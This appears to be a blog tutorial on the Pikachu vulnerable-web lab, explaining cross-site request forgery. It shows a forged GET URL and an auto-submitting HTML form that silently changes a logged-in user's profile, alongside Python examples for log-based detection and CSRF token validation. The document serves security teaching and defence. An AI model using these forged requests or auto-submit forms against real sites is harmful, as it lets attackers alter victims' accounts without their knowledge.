Pikachu CSRF

Overview:

CSRF (Cross-Site Request Forgery) overview. In a CSRF attack scenario, the attacker forges a request (usually a link) and tricks the target user into clicking it; once the user clicks, the whole attack is complete. That is why CSRF is also called a "one click" attack. Many people are unclear about the concept of CSRF and confuse it with XSS, or even with unauthorized access (越权); that confusion comes from not understanding the principle.
Here is a scenario to explain it, which hopefully helps you understand.
Scenario:
Xiao Hei (the attacker) wants to modify the membership address that Xiao Bai (the victim) filled in on the shopping site www.xx.com.
Let's look at how Xiao Bai modifies his own information:
Log in --- modify membership information, submit the request --- modified successfully.
So, for Xiao Hei to modify Xiao Bai's information, he needs: 1. login permission; 2. the request that modifies personal information.
But Xiao Bai is not going to tell Xiao Hei his account password for the xxx site, so what does Xiao Hei do?
He registers his own account on www.xx.com and modifies his own personal information (for example the E-mail address), and finds that the modification request is:
http://www.xxx.com/edit.php?email=[email protected]&Change=Change
So he carries out the following operation: he disguises this link and sends it to Xiao Bai, tricking him into clicking it after logging in to the xxx site. After Xiao Bai clicks the link, his personal information is modified, and Xiao Hei's attack is complete.
Why does Xiao Hei's operation work? There are several key points:
1. www.xxx.com does not perform enough checks when a user modifies personal information, so the request is easy to forge;
--- Therefore, deciding whether a website has a CSRF vulnerability is really deciding whether its operations on critical information (such as passwords and other sensitive data: create, delete, modify) are easy to forge.
2. Xiao Bai clicked the link Xiao Hei sent him, and at that moment happened to be logged in to the shopping site;
--- If Xiao Bai has good security awareness and does not click unknown links, the attack will not succeed; and even if Xiao Bai clicks the link but is not logged in to the shopping site at that time, it will still not succeed.
--- Therefore, a successful CSRF attack needs "the right time, the right place and the right people" to come together.
Of course, if Xiao Hei had earlier found an XSS vulnerability on the front page of the xxx site, he might do this instead: trick Xiao Bai into visiting a page with an XSS script planted in it (a cookie-stealing script); Xiao Bai falls for it, Xiao Hei obtains Xiao Bai's cookie, logs in to Xiao Bai's account with it, and modifies Xiao Bai's information himself.
--- Comparing this with the case above shows the difference between CSRF and XSS: CSRF borrows the user's privileges to complete the attack (the attacker never obtains the user's privileges), whereas XSS steals the user's privileges outright and then does the damage. So if a website wants to prevent CSRF attacks, it needs to implement corresponding security measures for operations on sensitive information, so that they cannot be forged in the way that leads to CSRF. For example:
- add a secure token to operations on sensitive information;
- add a verification code (captcha) to operations on sensitive information;
- implement a secure logic flow for operations on sensitive information, for example requiring the old password to be checked when changing the password.

 

  1.CSRF(get)

First, log in with an account:

Try to modify my personal information and submit it, while using BurpSuite to capture the profile modification request:

From the captured request we can see that the information is modified by a GET request, so we take this request, change it, and then have lucy click it. We construct a URL in which the address field (add) is changed to ppsuc; lucy clicks the modified address:

test.com:8081/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=ppsuc&email=lucy%40pikachu.com&submit=submit

The result confirms that the information has been modified:

  2.CSRF(POST)

If the request is a POST, all parameters are submitted in the request body, so the attack cannot be carried out simply by forging a URL.

Instead, a link to a file on the attacker's own server has to be constructed: a page which, when visited, automatically POSTs the data to the PHP file that modifies personal information.

So construct the HTML:

<html>
<head>
<script>
// As soon as the page has loaded, click the submit button so the form is posted without any user action
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<!-- same field names and values as the legitimate edit form, pointed at the POST edit endpoint -->
<form method="post" action="http://test.com:8081/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="12345678922" />
    <input id="add" type="text" name="add" value="ppsuc" />
    <input id="email" type="text" name="email" value="lucy@pikachu.com" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

When this HTML loads it immediately triggers a click on the element with id postsubmit, which submits the data of the constructed form; since the form values we constructed are the data we want, this causes the CSRF.

Next, test it:

With lucy already logged in, click the URL: http://test.com:8081/pikachu-master/vul/csrf/csrfpost/post.html

It first redirects, and then the information is modified successfully.
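As an added defender's example (not part of the original post), here is a small Python check that runs the same idea over web server access-log lines: state-changing requests to the GET and POST edit endpoints from sections 1 and 2 whose Referer is missing or comes from another origin are flagged for triage. The combined-format log lines, the site origin test.com:8081 and the host evil.example are constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample of combined-format access log lines (not taken from the original post).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2019:10:00:01 +0800] "GET /pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=ppsuc&email=lucy%40pikachu.com&submit=submit HTTP/1.1" 302 0 "http://evil.example/lure.html" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2019:10:00:02 +0800] "GET /pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=18888888888&add=beijing&email=lucy%40pikachu.com&submit=submit HTTP/1.1" 302 0 "http://test.com:8081/pikachu-master/vul/csrf/csrfget/csrf_get.php" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2019:10:00:03 +0800] "POST /pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2019:10:00:04 +0800] "GET /pikachu-master/vul/csrf/csrfget/csrf_get.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# client, timestamp, method, target, status, referer, user-agent
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$'
)

# Endpoints from the post that change the profile; the site's own origin is an assumption.
STATE_CHANGING = ("/csrf_get_edit.php", "/csrf_post_edit.php")
SITE_ORIGINS = ("test.com:8081",)


def is_same_origin(referer):
    """True only when the Referer is present and points at the site's own origin."""
    if referer in ("", "-"):
        return False
    return urlsplit(referer).netloc in SITE_ORIGINS


def find_suspicious(log_text):
    """Return (client, method, path, referer) for state-changing requests
    whose Referer is missing or belongs to another origin."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a log line we understand
        client, _ts, method, target, _status, referer, _ua = m.groups()
        path = target.split("?", 1)[0]
        if not path.endswith(STATE_CHANGING):
            continue  # read-only page, nothing to forge
        if not is_same_origin(referer):
            hits.append((client, method, path, referer))
    return hits
```

A missing Referer is treated as suspicious here, which gives false positives when a browser or Referrer-Policy strips it, so this is a triage signal rather than a control; the token described in the next section is the actual fix.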

 

 

  3.CSRF TOKEN

The main problem behind CSRF is that sensitive operations are easy to forge; adding a Token makes the request hard to forge.

A random code is added to every request, and the backend validates this random code on every request.

Go to the CSRF(token) page on the Pikachu platform, log in, and look at this GET request:

Here the token is randomly generated, so there is currently no way to forge the URL.
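As an added example of the server side of this check (written in Python for illustration, not Pikachu's own PHP code), the following mints a random token bound to the logged-in session when the edit form is rendered, and the edit handler rejects any request whose token is missing, wrong, or already used, so the forged GET and POST requests from the earlier sections fail while the real form still works. The in-memory session store and the function names are hypothetical.

```python
import hmac
import secrets

# Hypothetical in-memory session store: session id -> session data.
SESSIONS = {}


def login(user):
    """Create a session for a user and return its id (the cookie value)."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "profile": {}, "csrf_token": None}
    return sid


def render_edit_form(sid):
    """Server side of the form page: mint a fresh random token and bind it
    to this session. The returned value would go into a hidden form field."""
    token = secrets.token_hex(16)
    SESSIONS[sid]["csrf_token"] = token
    return token


def handle_edit(sid, params):
    """Server side of the edit endpoint. Returns (ok, message).
    A forged request has a valid session cookie but no way to know the token."""
    session = SESSIONS.get(sid)
    if session is None:
        return False, "not logged in"
    expected = session.get("csrf_token")
    supplied = params.get("token", "")
    # Constant-time comparison; a missing, wrong or stale token is rejected.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "csrf token missing or invalid"
    session["csrf_token"] = None  # single use: a captured token cannot be replayed
    for field in ("sex", "phonenum", "add", "email"):
        if field in params:
            session["profile"][field] = params[field]
    return True, "profile updated"
```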


Origin www.cnblogs.com/P201721440017/p/12059145.html